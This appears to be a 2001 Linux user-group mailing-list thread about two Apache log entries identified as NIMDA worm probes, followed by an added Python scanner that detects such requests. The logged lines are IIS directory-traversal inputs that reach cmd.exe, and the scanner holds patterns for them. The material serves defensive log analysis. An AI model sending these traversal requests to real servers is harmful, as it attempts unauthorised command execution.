It's the NIMDA worm. The infected host is 210.106.73.5.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, November 21, 2001 8:41 AM
To: [EMAIL PROTECTED]
Subject: [plug] Apache access log

Hi,

I did tail -f /etc/httpd/logs/access_log to our Apache web server. Here is the output.

210.106.73.5 - - [21/Nov/2001:07:56:31 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
210.106.73.5 - - [21/Nov/2001:07:56:31 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304

What does "/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304" mean?

- Roi
Angeles Communications
- Mark 8:36 For what shall it profit a man, if he shall gain the whole world, and lose his own soul?

_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
To subscribe to the Linux Newbies' List: send "subscribe" in the body to [EMAIL PROTECTED]
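
Added example, not part of the original thread: a small Python scanner that picks requests like the two above out of an Apache access log and groups them by client IP. The function names and the third (benign) log line are constructed for illustration; the log is assumed to be in Apache common log format.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample: the two entries from the post plus one benign request.
SAMPLE_LOG = r'''210.106.73.5 - - [21/Nov/2001:07:56:31 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
210.106.73.5 - - [21/Nov/2001:07:56:31 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
192.0.2.10 - - [21/Nov/2001:07:57:02 +0800] "GET /index.html HTTP/1.0" 200 1024
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?) (HTTP/[\d.]+)" (\d{3}) (\S+)$')

def fully_decode(target, max_rounds=5):
    """Percent-decode repeatedly so double encoding (%255c -> %5c -> backslash) is unwrapped."""
    raw = target.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def classify(target):
    """Return the set of reasons a request target looks like a Windows/IIS traversal probe."""
    raw = fully_decode(target)
    reasons = set()
    if b"../" in raw or b"..\\" in raw:
        reasons.add("traversal")
    if re.search(rb"%25[0-9a-f]{2}", target.encode("latin-1", "replace"), re.I):
        reasons.add("double-encoding")
    if b"\xc0" in raw or b"\xc1" in raw:  # 0xC0/0xC1 never occur in valid UTF-8
        reasons.add("overlong-utf8")
    if re.search(rb"cmd\.exe", raw, re.I):
        reasons.add("windows-shell")
    return reasons

def scan(log_text):
    """Map client IP -> list of (HTTP status, reasons) for every suspicious request."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, _proto, status, _size = m.groups()
        reasons = classify(target)
        if reasons:
            hits[ip].append((int(status), reasons))
    return dict(hits)
```

The status in each hit shows how the server answered: both requests in the post got 404, meaning Apache found nothing at those paths.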
